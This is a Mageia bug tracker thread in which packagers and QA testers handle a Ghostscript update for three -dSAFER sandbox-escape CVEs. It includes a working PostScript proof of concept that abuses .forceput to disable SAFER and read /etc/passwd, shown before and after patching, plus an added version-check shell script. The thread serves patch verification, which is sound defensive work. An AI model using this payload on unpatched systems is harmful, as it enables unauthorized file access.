| Summary: | ghostscript new security issue CVE-2018-17961, CVE-2018-18073 and CVE-2018-18284 | | |
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | normal | | |
| Priority: | Normal | CC: | andrewsfarm, marja11, nicolas.salguero, smelror, sysadmin-bugs, tarazed25, tmb |
| Version: | 6 | Keywords: | advisory, validated_update |
| Target Milestone: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | MGA6-64-OK | | |
| Source RPM: | ghostscript-9.24-8.mga7.src.rpm | CVE: | CVE-2018-17961, CVE-2018-18073, CVE-2018-18284 |
| Status comment: | | | |
Description

David Walser
2018-10-09 21:58:03 CEST

David Walser
2018-10-09 21:58:12 CEST
Whiteboard: (none) => MGA6TOO

Bug 23526, our previous update, didn't mention:
CVE-2018-11645
CVE-2018-16585
CVE-2018-17183

Ubuntu has issued advisories for those on September 19 and October 1:
https://usn.ubuntu.com/3768-1/
https://usn.ubuntu.com/3773-1/

Assigning to all packagers collectively, since there is no registered maintainer for this package. Also CC'ing two committers.
CC: (none) => marja11, nicolas.salguero, smelror

Suggested advisory:
========================

The updated packages fix many bugs and a security vulnerability:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://www.openwall.com/lists/oss-security/2018/10/09/4
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.mga6
ghostscript-dvipdf-9.25-1.mga6
ghostscript-common-9.25-1.mga6
ghostscript-X-9.25-1.mga6
ghostscript-module-X-9.25-1.mga6
lib(64)gs9-9.25-1.mga6
lib(64)gs-devel-9.25-1.mga6
lib(64)ijs1-0.35-140.mga6
lib(64)ijs-devel-0.35-140.mga6
ghostscript-doc-9.25-1.mga6

from SRPMS:
ghostscript-9.25-1.mga6.src.rpm
Status: NEW => ASSIGNED
Nicolas Salguero
2018-10-10 15:12:40 CEST
Assignee: pkg-bugs => qa-bugs

(In reply to David Walser from comment #4)
> What about Comment 1?

According to MITRE:
- CVE-2018-11645: Ghostscript before 9.21rc1
- CVE-2018-16585: Ghostscript before 9.24
- CVE-2018-17183: Ghostscript before 9.25 but the commit linked to that CVE was already in our ghostscript-9.24 package.

One more commit is necessary:
https://www.openwall.com/lists/oss-security/2018/10/11/3
Keywords: (none) => feedback

And yet another needed commit with a new CVE:
https://www.openwall.com/lists/oss-security/2018/10/10/12
Summary: ghostscript new security issue CVE-2018-17961 => ghostscript new security issue CVE-2018-17961 and CVE-2018-18073

Suggested advisory:
========================

The updated packages fix many bugs and security vulnerabilities:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

Saved execution stacks can leak operator arrays. (CVE-2018-18073)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073
https://www.openwall.com/lists/oss-security/2018/10/09/4
https://www.openwall.com/lists/oss-security/2018/10/11/3
https://www.openwall.com/lists/oss-security/2018/10/10/12
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.1.mga6
ghostscript-dvipdf-9.25-1.1.mga6
ghostscript-common-9.25-1.1.mga6
ghostscript-X-9.25-1.1.mga6
ghostscript-module-X-9.25-1.1.mga6
lib(64)gs9-9.25-1.1.mga6
lib(64)gs-devel-9.25-1.1.mga6
lib(64)ijs1-0.35-140.1.mga6
lib(64)ijs-devel-0.35-140.1.mga6
ghostscript-doc-9.25-1.1.mga6

from SRPMS:
ghostscript-9.25-1.1.mga6.src.rpm
Nicolas Salguero
2018-10-12 09:50:51 CEST
Keywords: feedback => (none)

Mageia 6, x86_64

Topped up the pre-update packages.

Before update:

CVE-2018-17961
https://www.openwall.com/lists/oss-security/2018/10/10/12

```
$ gs -dSAFER -sDEVICE=ppmraw
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit) [...] null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1916 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}]
GS>quit
```

Quoting the reference above: "Once you have a reference to forceput, you can do anything you like, see the exploit for CVE-2018-18073 as an example of abusing forceput to get arbitrary filesystem access."

I could not find that exploit but updating solved the problem.

Waiting for the mirrors to sync.

Tested the earlier update. When the new files appear I will run through the same tests again and report any differences in behaviour.

After the first update you can access the error stack safely:

```
$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- --.setglobal-- --%loop_continue-- --.setglobal-- --.setglobal-- false 1 --%stopped_push-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1920 1 3 --%oparray_pop-- --.setglobal--]
GS>
```

Ran a few simple tests of gs.

Displayed a postscript file.

```
$ gs abc-0.ps
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Querying operating system for font files...
Can't find (or can't open) font file /usr/share/ghostscript/9.25/Resource/Font/BorzoiRegular.
Can't find (or can't open) font file BorzoiRegular.
Loading BorzoiRegular font from /home/lcl/.local/share/fonts/BorzoiRegular.pfb... 4495204 2874741 3183244 1851046 3 done.
>>showpage, press <return> to continue<<
GS>quit
```

LibreOffice has ghostscript support. The same file displayed OK with that.

Browsed an e-book pdf file with gs, hitting return to turn the pages. On quit it insisted on flicking through the rest of the 832 pages.

Converted a dvi file to a pdf.

```
$ dvipdf refcard.dvi refcard.pdf
dvips: Font cmbx10 at 13824 not found; scaling 600 instead.
dvips: Such scaling will generate extremely poor output.
Page 1 may be too complex to print
Page 2 may be too complex to print
Page 5 may be too complex to print
Page 6 may be too complex to print
Warning: no %%Page comments generated.
```

In fact it reproduced perfectly in okular - no loss of quality.

Looks OK for 64-bits.
CC: (none) => tarazed25

CVE-2018-18073 has reserved status; no details of possible exploits available. Passing it on.
Whiteboard: (none) => MGA6-64-OK

Ugh, another commit is needed for CVE-2018-18284:
https://www.openwall.com/lists/oss-security/2018/10/16/2

Can we add it in?

Suggested advisory:
========================

The updated packages fix many bugs and security vulnerabilities:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

Saved execution stacks can leak operator arrays. (CVE-2018-18073)

1Policy operator gives access to .forceput. (CVE-2018-18284)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18284
https://www.openwall.com/lists/oss-security/2018/10/09/4
https://www.openwall.com/lists/oss-security/2018/10/11/3
https://www.openwall.com/lists/oss-security/2018/10/10/12
https://www.openwall.com/lists/oss-security/2018/10/16/2
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.2.mga6
ghostscript-dvipdf-9.25-1.2.mga6
ghostscript-common-9.25-1.2.mga6
ghostscript-X-9.25-1.2.mga6
ghostscript-module-X-9.25-1.2.mga6
lib(64)gs9-9.25-1.2.mga6
lib(64)gs-devel-9.25-1.2.mga6
lib(64)ijs1-0.35-140.2.mga6
lib(64)ijs-devel-0.35-140.2.mga6
ghostscript-doc-9.25-1.2.mga6

from SRPMS:
ghostscript-9.25-1.2.mga6.src.rpm
Nicolas Salguero
2018-10-17 09:40:03 CEST
CVE: (none) => CVE-2018-17961, CVE-2018-18073, CVE-2018-18284

Nicolas Salguero
2018-10-17 09:41:01 CEST
Whiteboard: MGA6-64-OK => (none)

ghostscript-9.25-1.1.mga6

CVE-2018-18284

Tried out the commands given at https://www.openwall.com/lists/oss-security/2018/10/16/2

```
$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
GS>systemdict /userparams get /PermitFileControl [(*)] .forceput
GS>systemdict /userparams get /PermitFileWriting [(*)] .forceput
GS>systemdict /userparams get /PermitFileReading [(*)] .forceput
GS>(/etc/passwd) (r) file 1024 string readline pop ==
(root:x:0:0:root:/root:/bin/bash)(root:x:0:0:root:/root:/bin/bash)
GS>quit
```

The new version is not on the mirrors yet. Later.

Updated the packages.
```
$ rpm -qa | grep ghostscript
ghostscript-9.25-1.2.mga6
ghostscript-module-X-9.25-1.2.mga6
ghostscript-dvipdf-9.25-1.2.mga6
ghostscript-common-9.25-1.2.mga6
ghostscript-X-9.25-1.2.mga6
$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1
get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
Error: /undefined in .policyprocs
Operand stack:
--dict:963/1684(ro)(G)-- SAFER false --dict:0/0(L)-- --dict:0/0(L)-- --dict:963/1684(ro)(G)-- (ignored) SAFER false
Execution stack:
%interp_exit .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- --nostringval-- %loop_continue --nostringval-- --nostringval-- false 1 %stopped_push .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- --nostringval--
Dictionary stack:
--dict:963/1684(ro)(G)-- --dict:0/20(G)-- --dict:79/200(L)--
Current allocation mode is local
Last OS error: No such file or directory
Current file position is 34
```

Any further attempts to use systemdict are thwarted in the same way.

Good result.

Ran simple tests again. Printed a postscript file. It looks fine.
Whiteboard: (none) => MGA6-64-OK

Looks good to me, after Len's tests. Validating.

Correct (I think) advisory suggestion in Comment 13.
Keywords: (none) => validated_update
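As an added example that is not part of the bug report, the following POSIX shell check reads `rpm -qa` style lines and reports any Mageia 6 ghostscript package still below the releases listed in the advisory suggestion above (9.25-1.2.mga6 for the ghostscript and libgs packages, 0.35-140.2.mga6 for the libijs packages); the sample package lines are constructed, and the version comparison assumes GNU `sort -V`.

```shell
#!/bin/sh
# Added example, not from the bug report: check rpm -qa style lines for
# Mageia 6 ghostscript packages still below the releases listed in the
# advisory suggestion (9.25-1.2.mga6 / 0.35-140.2.mga6). Needs GNU sort -V.

# Fixed version-release per package name, taken from the advisory text.
fixed_vr_for() {
    case "$1" in
        ghostscript|ghostscript-*|lib64gs9|libgs9|lib64gs-devel|libgs-devel)
            echo "9.25-1.2.mga6" ;;
        lib64ijs1|libijs1|lib64ijs-devel|libijs-devel)
            echo "0.35-140.2.mga6" ;;
        *) return 1 ;;   # not one of the packages in this update
    esac
}

# Split NAME-VERSION-RELEASE: the last two dash-separated fields are V-R.
pkg_name() { printf '%s\n' "$1" | sed 's/-[^-]*-[^-]*$//'; }
pkg_vr()   { printf '%s\n' "$1" | sed 's/.*-\([^-]*-[^-]*\)$/\1/'; }

# vr_at_least INSTALLED FIXED: succeeds when INSTALLED sorts >= FIXED.
vr_at_least() {
    [ "$(printf '%s\n%s\n' "$2" "$1" | sort -V | tail -n 1)" = "$1" ]
}

# check_packages: reads NEVR lines on stdin, prints each package that is
# still below its fixed release, returns 0 only when none is reported.
check_packages() {
    rc=0
    while read -r nevr; do
        [ -n "$nevr" ] || continue
        name=$(pkg_name "$nevr")
        fixed=$(fixed_vr_for "$name") || continue
        if ! vr_at_least "$(pkg_vr "$nevr")" "$fixed"; then
            echo "UNFIXED: $nevr (need $name-$fixed)"
            rc=1
        fi
    done
    return $rc
}

# Constructed sample of a system still on the 1.1 build (not real output).
SAMPLE_PRE="ghostscript-9.25-1.1.mga6
ghostscript-common-9.25-1.1.mga6
lib64ijs1-0.35-140.1.mga6
bash-4.3.48-1.mga6"

# On a live system: rpm -qa | check_packages
```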
Thomas Backlund
2018-10-19 18:45:23 CEST
Keywords: (none) => advisory

An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2018-0408.html
Resolution: (none) => FIXED